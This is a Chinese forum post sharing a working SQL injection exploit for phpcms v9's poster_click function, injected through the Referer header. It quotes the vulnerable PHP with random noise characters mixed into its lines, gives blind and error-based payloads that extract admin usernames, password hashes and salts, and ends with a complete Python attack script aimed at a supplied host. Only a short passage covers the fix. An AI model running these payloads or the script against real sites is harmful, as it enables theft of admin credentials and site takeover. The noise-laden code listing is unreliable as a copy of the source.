
标题: phpcms poster_click 注入 0day 利用代码

作者: admin    时间: 2013-1-11 21:01
标题: phpcms poster_click 注入 0day 利用代码
有人放出了 phpcms v9 的 0day,就随手写了个利用代码。注入代码有两种形式,见下文。

问题函数: \phpcms\modules\poster\index.php 中的 poster_click()。根本原因是该方法把未经任何过滤的 HTTP_REFERER(攻击者完全可控的请求头)直接放进 $this->s_db->insert() 的数据数组拼入 SQL;另外 $_GET['url'] 未经校验就被直接用于 header('Location: ...') 跳转,同时构成开放重定向。修复思路:写库前对 referer 做转义(或由 db 层统一参数化/转义),并把跳转目标限制为该广告位配置中的 linkurl。

  I  G4 Q/ ~) E/ q* C. Zpublic function poster_click() {- U: r5 J4 c, u' _
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
4 T! r. X2 q) d, X, n" j$r = $this->db->get_one(array('id'=>$id));
0 a9 |4 b6 {7 Y. L# Eif (!is_array($r) && empty($r)) return false;# g& ]* f1 o2 n( h6 R6 w2 |
$ip_area = pc_base::load_sys_class('ip_area');& ?8 F  T" {  U6 j* l
$ip = ip();
+ b% P7 `6 v! S7 c  t. T" D$area = $ip_area->get($ip);
$ i/ F% Y- R4 f& A7 s% ?6 s9 \$username = param::get_cookie('username') ? param::get_cookie('username') : '';
0 T: b! _0 ]. G; p# Iif($id) {) w4 }6 `) J- q3 y1 T& n
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
/ E7 y' g; N- ]* v6 w$ ^$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));# ?+ Q7 _* c7 w: h5 {. L
}
+ v/ Y9 n2 D2 |/ S" m) l. q9 l# `$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
! b1 n9 f$ E; f6 W* `" e1 n$setting = string2array($r['setting']);5 d+ r- e* b  h# E% P! x
if (count($setting)==1) {# h4 e5 U. G1 u/ R  [& b( c$ I3 f# q
$url = $setting['1']['linkurl'];' u  Q7 j. l" `0 w7 q/ }6 R
} else {6 G0 }/ V! v" @5 N- |! c
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
, x% d7 U2 T0 n) s2 r5 d}: c: S) X2 z) \2 Y. v/ H% m
header('Location: '.$url);
4 q6 U5 B: s% g, n$ c}
利用方式:

1、可以采用盲注入的手法:

referer:1',(select password from v9_admin where userid=1 substr(password,4)='xxoo'),'1')#

根据返回页面是否正常,逐位猜解密码字段。

2、代码是花开写的,随手附上了:

1',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),'1')#

此方法是报错注入手法(利用 rand(0) 配合 group by 触发的 Duplicate entry 错误把查询结果回显出来),原理自查。注意:只有目标页面会把数据库错误信息输出到响应中时才能直接看到结果;payload 里的表名 v9_admin 使用的是 v9_ 表前缀,目标若改过前缀需自行调整。

利用程序(仅限在已获授权的目标上使用):
#!/usr/bin/env python
import httplib,sys,re
  }) o0 o7 N2 h6 q/ q) s/ |$ m- k" G( ]
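def attack():
    """Send the published phpcms v9 poster_click error-based injection and print what leaks.

    Target is taken from ``sys.argv``: ``argv[1]`` is the host, ``argv[2]`` the install
    path (``/`` or ``/phpcmsv9/``), and an optional ``argv[3]`` the poster id (default
    ``"2"``). ``poster_click()`` returns early when the poster id does not exist, so the
    insert -- and therefore the injection -- only fires for an id that is present.

    The crafted ``Referer`` header is stored unescaped by ``poster_click()``; MySQL's
    ``Duplicate entry '...'`` error then carries the selected columns back in the
    response body. Prints the first such match, or a diagnostic when there is none
    (previously this crashed with ``IndexError``).

    Only run against systems you are authorised to test.
    """
    # Python 2 ships httplib; Python 3 renamed it to http.client.
    try:
        import httplib
    except ImportError:
        import http.client as httplib

    print("Code by Pax.Mac Team conqu3r!")
    print("Welcome to our zone!!!")
    host = sys.argv[1]
    # Strip the trailing slash so a path of "/" does not produce "//index.php".
    path = sys.argv[2].rstrip("/")
    poster_id = sys.argv[3] if len(sys.argv) > 3 else "2"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5",
        "Accept": "text/plain",
        "Referer": "1',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),'1')#",
    }
    conn = httplib.HTTPConnection(host)
    try:
        conn.request(
            "GET",
            path + "/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=" + poster_id,
            headers=headers,
        )
        body = conn.getresponse().read()
    finally:
        # Close the socket even if the request raises.
        conn.close()
    # Python 3 returns bytes; Python 2 str is already bytes-like for the regex.
    if not isinstance(body, str):
        body = body.decode("utf-8", "replace")
    # The leaked row is embedded in MySQL's "Duplicate entry '...'" error text.
    leaked = re.findall(r"Duplicate entry '\w+'", body)
    if leaked:
        print(leaked[0])
    else:
        print("No 'Duplicate entry' error in response: target may be patched, "
              "error output disabled, or poster id %s does not exist." % poster_id)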
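if __name__ == "__main__":
    # Two positional arguments are required: target host and install path.
    # Fixed the "Usgae"/"phpcmsataack" typos in the usage text.
    if len(sys.argv) < 3:
        print("Code by Pax.Mac Team conqu3r")
        print("Usage:")
        print("    phpcmsattack.py   www.paxmac.org /")
        print("    phpcmsattack.py   www.paxmac.org /phpcmsv9/")
        sys.exit(1)
    attack()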
